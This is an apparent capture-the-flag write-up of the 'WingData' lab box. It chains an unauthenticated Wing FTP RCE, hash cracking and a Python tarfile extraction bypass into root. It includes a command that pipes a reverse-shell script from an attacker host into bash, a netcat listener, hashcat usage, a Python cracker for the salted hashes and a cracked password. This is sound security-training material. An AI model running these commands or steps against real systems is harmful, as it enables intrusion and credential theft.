Myles Nieman

WingData

Overview

WingData is an easy Linux box running Wing FTP Server 7.4.3 on a subdomain discovered through the web portal. That version is vulnerable to an unauthenticated RCE (CVE-2025-47812, public exploit at ExploitDB 52347), landing a shell as the wingftp service user. The server's XML configuration files store SHA-256 password hashes computed over the plaintext with the string :WingFTP appended; cracking them recovers credentials for a local system user. That user's home directory contains a backup script run as root that extracts attacker-controlled archives, exploitable via CVE-2025-4138 (a bypass of the tarfile extraction filters introduced in Python 3.12) to write an arbitrary file as root.

Path: Wing FTP 7.4.3 RCE → wingftp service shell → hash cracking from XML config → SSH as local user → CVE-2025-4138 archive extraction bypass → root.

Enumeration

A standard nmap scan shows SSH and an Apache web server redirecting to wingdata.htb:

$ nmap -T4 -A 10.129.10.205
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7
80/tcp open  http    Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://wingdata.htb/

[Screenshot: HTB spawn card hinting at a zipslip vulnerability for this box]

After adding wingdata.htb to /etc/hosts, the web portal’s “Client Portal” button reveals a subdomain: ftp.wingdata.htb.

[Screenshot: the wingdata.htb portal exposing ftp.wingdata.htb via the client portal link]

Browsing to http://ftp.wingdata.htb shows a Wing FTP Server web interface reporting version 7.4.3.

Foothold — Wing FTP Server Unauthenticated RCE

Wing FTP Server 7.4.3 is vulnerable to an unauthenticated remote code execution flaw, CVE-2025-47812 (fixed in 7.4.4): a NUL byte in the login username lets an attacker inject Lua code into the session file the server later executes. The public exploit at ExploitDB 52347 confirms the target is vulnerable and accepts a command to execute:

$ python3 exploit.py -u http://ftp.wingdata.htb
[*] Testing target: http://ftp.wingdata.htb
[+] http://ftp.wingdata.htb is vulnerable!

I hosted a reverse shell script (rev.sh, served over HTTP on port 8888) and used the exploit to fetch and execute it, with a listener waiting on port 8081:

$ nc -lvnp 8081
$ python3 exploit.py -u http://ftp.wingdata.htb -c 'curl 10.10.16.244:8888/rev.sh | bash'

[Screenshot: reverse shell landing as the wingftp service user]

The shell arrives as wingftp.

User — Cracking Wing FTP Password Hashes

The Wing FTP data directory contains XML configuration files for both admin accounts and regular FTP users:

wingftp@wingdata:/opt/wftpserver/Data$ ls
1  _ADMINISTRATOR  bookmark_db  settings.xml  ssh_host_ecdsa_key  ssh_host_key

The admin account config at _ADMINISTRATOR/admins.xml contains a SHA-256 hash:

<Admin_Name>admin</Admin_Name>
<Password>a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba</Password>

The user XML files under Data/1/users/ contain hashes for several accounts: maria, steve, wacky, john, and anonymous. Wing FTP does not hash the bare password; it appends the string :WingFTP to the plaintext and hashes the result with SHA-256, so a raw SHA-256 dictionary attack on these values will not match.

Running linpeas confirms how the service is configured and helps pin down the hash format:

[Screenshot: linpeas output on the wingftp shell showing service details]

[Screenshot: linpeas output and manual grep highlighting the salted hash format]

Cracking has to account for the salt. hashcat mode 1400 is raw SHA-256 and takes no salt, so with that mode the candidates need a rule that appends :WingFTP; the direct equivalent is mode 1410 (sha256($pass.$salt)) with the salt supplied as hex via --hex-salt, because the colon inside :WingFTP would otherwise be read as hashcat's hash:salt separator. The command used here:

$ hashcat -m 1400 -a 0 <hash> /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt --force

One of the user hashes cracks to reveal a password:

!#7Blushing^*Bride5

[Screenshot: hashcat cracking one of the Wing FTP user hashes]

That password works for SSH access as the corresponding local system user.

[Screenshot: SSH login with the cracked credential]

The user flag is in that user’s home directory.
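The hash scheme described above, as an added example (not code from the writeup or from Wing FTP): a small cracker that hashes each candidate with :WingFTP appended, a parser that pulls name/hash pairs out of an admins.xml-shaped blob, and a helper that formats the hash:salt line for hashcat mode 1410 with --hex-salt. The wordlist and the XML sample are constructed here, with the sample hash derived from a chosen plaintext; only the <Admin_Name> and <Password> tags come from the writeup, the surrounding elements are assumed.

```python
import hashlib
import xml.etree.ElementTree as ET

WING_SALT = ":WingFTP"  # the string the writeup says Wing FTP appends before hashing


def wing_hash(password: str, salt: str = WING_SALT) -> str:
    """SHA-256 over password||salt, the scheme described in the writeup."""
    return hashlib.sha256((password + salt).encode()).hexdigest()


def extract_password_hashes(xml_text: str):
    """Collect (name, hash) pairs from Wing FTP-style XML. Only the <Admin_Name> and
    <Password> tags come from the writeup; the surrounding elements are assumed."""
    pairs = []
    for node in ET.fromstring(xml_text).iter():
        name, pw = node.find("Admin_Name"), node.find("Password")
        if name is not None and pw is not None:
            pairs.append((name.text, pw.text.strip().lower()))
    return pairs


def crack(target_hex: str, candidates, salt: str = WING_SALT):
    """Dictionary attack: the candidate whose salted hash equals target_hex, else None."""
    target_hex = target_hex.lower()
    for cand in candidates:
        cand = cand.rstrip("\r\n")
        if wing_hash(cand, salt) == target_hex:
            return cand
    return None


def hashcat_line(target_hex: str, salt: str = WING_SALT) -> str:
    """hash:salt line for `hashcat -m 1410 --hex-salt` (sha256($pass.$salt)). The salt is
    given in hex because its own ':' would otherwise be read as hashcat's separator."""
    return f"{target_hex}:{salt.encode().hex()}"


# Constructed inputs for the demo: a tiny wordlist and an admins.xml-shaped blob whose
# hash is derived here from a chosen plaintext. Nothing below is from the box.
WORDLIST = ["123456", "password", "letmein", "wingftp2024"]
SAMPLE_XML = (
    "<Admins><Admin>"
    "<Admin_Name>admin</Admin_Name>"
    f"<Password>{wing_hash('letmein')}</Password>"
    "</Admin></Admins>"
)


def demo():
    """Parse the sample, then crack it with and without the salt."""
    name, h = extract_password_hashes(SAMPLE_XML)[0]
    return {
        "name": name,
        "salted": crack(h, WORDLIST),              # finds 'letmein'
        "unsalted": crack(h, WORDLIST, salt=""),   # raw SHA-256 guess: no match
        "hashcat": hashcat_line(h),
    }


if __name__ == "__main__":
    print(demo())
```

The unsalted run is the failure mode to watch for: the same wordlist and the same hash produce no hit when the salt is left off, which is exactly what an unsalted mode-1400 run without an append rule would report.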

Privilege Escalation — CVE-2025-4138 (Python Archive Extraction Bypass)

Exploring the home directory reveals a backup script that extracts zip archives from an uploads or backup staging location into a destination directory:

[Screenshot: backup script showing the archive extraction logic]

The script runs as root (via cron or a sudo rule) and hands the staged archive to Python's standard-library extraction. Two facts matter here. Python's zipfile has stripped leading slashes and .. components from member names since 3.3.1, so a plain zipslip against zipfile fails on any supported interpreter. Python's tarfile only gained equivalent protection with the extraction filters of PEP 706 (new in 3.12, backported to 3.8.17, 3.9.17, 3.10.12 and 3.11.4), and CVE-2025-4138 is a bypass of those filters, fixed in 3.12.11 and 3.13.4: a symlink member whose target resolves outside the destination is accepted, so a later member written through that link lands outside the extraction directory. Because the CVE is specific to tarfile, the call being abused is tarfile's filtered extraction; zipfile is not affected by this CVE, whatever extension the staged file carries.

By crafting an archive whose members resolve to /root/.ssh/authorized_keys (for CVE-2025-4138 that means a symlink member pointing outside the destination followed by a file member written through it, rather than a bare ../../root/.ssh/authorized_keys name, which the data filter still rejects) and placing it in the directory the backup script reads from, the next script execution writes the attacker-controlled content to the escaped path as root.

[Screenshot: CVE-2025-4138 extraction bypass working against the backup script]

Dropping an SSH public key into /root/.ssh/authorized_keys via the zipslip completes the escalation, and ssh root@wingdata.htb with the corresponding private key grants a root shell.

Takeaways

  • Wing FTP Server 7.4.3 ships with an unauthenticated RCE (CVE-2025-47812) that is point-and-shoot with a public PoC: any internet-exposed instance on this version is fully compromised without credentials, and on a default install the service runs as root or SYSTEM rather than a dedicated user.
  • CVE-2025-4138 shows that archive traversal remains relevant in modern Python: the tarfile extraction filters of PEP 706 had bypasses until 3.12.11 and 3.13.4, so a root-owned script that extracts attacker-controlled archives without validating each member before it touches disk is a reliable privilege escalation path regardless of interpreter version.